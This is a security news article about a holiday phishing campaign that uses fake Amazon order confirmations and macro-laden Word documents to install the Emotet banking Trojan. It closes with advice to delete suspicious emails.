Fake Amazon Order Confirmations Push Banking Trojans on Holiday Shoppers

Phishing and malspam campaigns are in high gear for the holidays and a new campaign pretending to be an Amazon order confirmation is particularly dangerous as people shop for holiday gifts.

In a new malspam campaign discovered by email security company EdgeWave, attackers are sending email disguised as very convincing Amazon order confirmations. These fake order confirmations are being sent with subject lines that include “Your order”, “Amazon order details”, and “Your order 162-2672000-0034071 has shipped”.

When you open these emails, you will be shown an order confirmation that states your item has shipped, but without any details regarding what was ordered or tracking information. It then tells the recipient to click on the Order Details button in order to see more information.

Fake Amazon Order Confirmation

When a user clicks on this button, it will download Word document named order_details.doc. When this file is opened, it will state that you need to Enable Content in order to properly view it as shown below.

Malicious Word Document

If a user clicks on the Enable Content button, macros will be triggered that execute a PowerShell command that downloads and execute the Emotet banking Trojan on the victim’s computer. In this case the name of the trojan was mergedboost.exe, but when EdgeWave tested the maldoc they told BleepingComputer that Emotet was being downloaded as Keyandsymbol.exe at that time.

Fiddler traffic showing Emotet being downloaded

This Trojan will now run silently in the background, while logging key strokes, stealing account information, and performing other unwanted activities on the computer.

EdgeWave told BleepingComputer that this campaign utilizes compromised servers located in Columbia, Indonesia, and the United States of America.

“Interestingly, these other servers are in Houston and Lansing. Playing Dora the Explorer for a moment, we’ve encountered a compromised email server in Columbia sending phishing email with a link to a server in Indonesia that downloads malware which then contacts compromised servers in the United States. The holidays are truly global!”

Due to how easy it could be for a recipient to fall for this scam, it is important that users pay close attention to who is sending them emails before attempting to open any documents or interact with the email. This is especially true during the holiday when it is common to receive a lot of email from online vendors.

When receiving email, it is important to examine who it came from and if it looks remotely suspicious, simply delete the email as you can always login to the site in question to check an order status. In this case, while the emails themselves were spot on and looked identical to an Amazon order confirmation, the email address that it came from were clearly suspect. Something as simple as that should be the only reason you need to just delete the email.

The Internet is a scary place at all times during the year, but even more so during the holidays. Be careful and be safe.